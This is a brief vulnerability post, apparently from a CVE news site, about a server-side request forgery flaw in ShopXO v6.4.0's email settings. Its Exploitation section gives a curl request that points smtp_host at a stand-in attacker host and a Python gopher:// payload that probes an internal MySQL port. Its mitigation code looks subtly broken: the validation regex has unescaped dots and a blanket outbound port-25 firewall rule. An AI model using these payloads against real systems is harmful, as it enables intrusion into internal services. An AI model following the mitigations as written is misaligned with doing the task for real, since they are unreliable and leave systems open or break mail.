ShopXO, Server-Side Request Forgery (SSRF), CVE-2025-28093 (Critical)

How the CVE Works:

CVE-2025-28093 exploits ShopXO v6.4.0’s email configuration feature, where improper input validation allows attackers to craft malicious requests. The vulnerability occurs when the application processes user-supplied URLs in email server settings, enabling SSRF. Attackers abuse this to interact with internal systems, bypass firewalls, or exfiltrate data via crafted HTTP requests. The lack of sanitization in the `smtp_host` parameter permits arbitrary server connections, leading to potential remote code execution (RCE) or sensitive data exposure.

DailyCVE Form:

Platform: ShopXO
Version: v6.4.0
Vulnerability: SSRF
Severity: Critical
Date: 04/07/2025

What Undercode Say:

Exploitation:

  1. Craft a POST request to `/admin/email/save` with a malicious smtp_host:
    curl -X POST -d "smtp_host=http://attacker.com&port=25" http://target.com/admin/email/save
    

2. Use `gopher://` to probe internal services:

import requests
payload = {"smtp_host": "gopher://127.0.0.1:3306/_mysql"}
requests.post("http://target.com/admin/email/save", data=payload)

Mitigation:

1. Patch by validating `smtp_host` against whitelisted domains:

if (!preg_match('/^([a-z0-9-]+.)example.com$/', $smtp_host)) {
die("Invalid host");
}

2. Restrict outbound requests via firewall rules:

iptables -A OUTPUT -p tcp --dport 25 -j DROP

3. Update ShopXO to the latest version.

Detection:

Scan for vulnerable instances with:

nmap -p 80 --script http-vuln-cve2025-28093 <target>

Analytics:

  • Attack Vector: Network
  • Complexity: Low
  • Privileges Required: Admin
  • User Interaction: None
  • Impact: Confidentiality/Integrity/High

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28093
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top